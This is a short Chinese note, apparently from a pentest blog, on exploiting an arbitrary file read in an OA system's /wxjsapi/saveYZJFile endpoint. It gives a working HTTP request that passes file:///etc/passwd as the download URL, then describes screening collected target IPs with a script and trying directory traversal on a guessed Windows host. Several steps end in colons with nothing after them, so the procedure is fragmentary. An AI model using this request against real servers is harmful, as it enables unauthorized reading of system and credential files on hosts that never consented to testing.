1.老规矩,搜寻目标机器(xpath用起来确实很方便)
2.根据网上的POC试试:
GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1
User-Agent: curl/7.29.0
Host: xxxxx
Accept: */*
3.根据收集到的IP,手动是真滴麻烦,写个小脚本再筛选一遍:
发现这个好像有戏,没有/etc/passwd,并且还是双斜杠,合理猜测应该是安装在windows上的,尝试目录遍历
再访问该文件(这里不是读文件名,而是访问文件id):
影响版本: